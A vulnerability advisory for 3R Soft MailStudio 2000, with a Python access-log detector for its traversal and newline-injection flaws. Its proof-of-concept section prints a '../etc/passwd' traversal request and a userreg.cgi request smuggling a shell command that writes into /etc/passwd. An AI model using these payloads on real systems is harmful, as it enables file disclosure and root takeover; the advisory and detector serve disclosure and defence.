3R Soft MailStudio 2000 Multiple Vulnerabilities
BID:1335
Info
| Bugtraq ID: | 1335 |
| Class: | Design Error |
| CVE: | CVE-2000-0526 CVE-2000-0527 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 09 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | File Viewing vulnerability discovered by Naif <[email protected]>, buffer overflow discovered by FuSyS <[email protected]>. Posted in a s0ftpj <http://www.s0ftpj.org> advisory on June 9, 2000. |
| Vulnerable: | 3R Soft MailStudio 2000 2.0 |
| Not Vulnerable: | |
Discussion
MailStudio 2000 is vulnerable to multiple attacks.
A remote user can gain read access to all files on the server by passing the "/.." string to a CGI, compromising the confidentiality of other users' email and passwords, as well as other configuration and password files on the system.
It is also possible to set a password for system user accounts that do not have one in place (e.g. operator, gopher).
There is also an input validation vulnerability in userreg.cgi. This CGI uses a shell to execute certain commands. Passing any command directly after %0a in the arguments of the CGI allows a remote user to execute the command as root.
userreg.cgi also has an unchecked buffer, which could allow remote attackers to execute arbitrary code as root.
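One way to spot the file-viewing and %0a request patterns in web server access logs, as an added example that is not part of the original advisory. The log format, the /cgi-bin/ prefix, the finding labels and the sample lines are constructed assumptions; the `html` parameter of mailview.cgi is taken from the requests listed under Exploit / POC.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not real traffic). Client IPs are from the
# 192.0.2.0/24 documentation range; the /cgi-bin/ prefix is an assumption.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jun/2000:10:00:01 +0000] "GET /cgi-bin/mailview.cgi'
    '?cmd=view&fldrname=inbox&select=1&html=msg1.html HTTP/1.0" 200 512',
    '192.0.2.66 - - [09/Jun/2000:10:00:07 +0000] "GET /cgi-bin/mailview.cgi'
    '?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd HTTP/1.0" 200 901',
    '192.0.2.66 - - [09/Jun/2000:10:00:09 +0000] "GET /cgi-bin/mailview.cgi'
    '?cmd=view&fldrname=inbox&select=1&html=..%2f..%2fetc%2fpasswd HTTP/1.0" 200 901',
    '192.0.2.66 - - [09/Jun/2000:10:00:15 +0000] "GET /cgi-bin/userreg.cgi'
    '?cmd=insert&lang=eng&tnum=3&fld1=test999%0aCONSTRUCTED HTTP/1.0" 200 77',
    '192.0.2.11 - - [09/Jun/2000:10:01:00 +0000] "GET /cgi-bin/userreg.cgi'
    '?cmd=insert&lang=eng&tnum=3&fld1=alice HTTP/1.0" 200 77',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CONTROL_RE = re.compile(r'[\x00-\x1f\x7f]')  # newline (%0a) and other control bytes


def classify(line):
    """Return a list of finding labels for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit('/', 1)[-1].lower()
    findings = []
    # parse_qsl percent-decodes, so %2f and %0a are checked in decoded form.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        segments = value.replace('\\', '/').split('/')
        if script == 'mailview.cgi' and name == 'html' and '..' in segments:
            findings.append('mailview-traversal')
        if script == 'userreg.cgi' and CONTROL_RE.search(value):
            findings.append('userreg-control-char:' + name)
    return findings


def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return {n: found for n, found in results if found}
```

The same two checks, a ".." path segment in the decoded `html` value and any control character in a userreg.cgi argument, are also what a filtering front end would reject before the request reaches the CGI.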
Exploit / POC
s0ftpr0ject <http://www.s0ftpj.org> has provided the following exploits:
Mail view vulnerability:
mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
userreg.cgi vulnerability:
userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
Fyodor <[email protected]> has provided the following exploit for the buffer overflow:
Solution / Fix
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].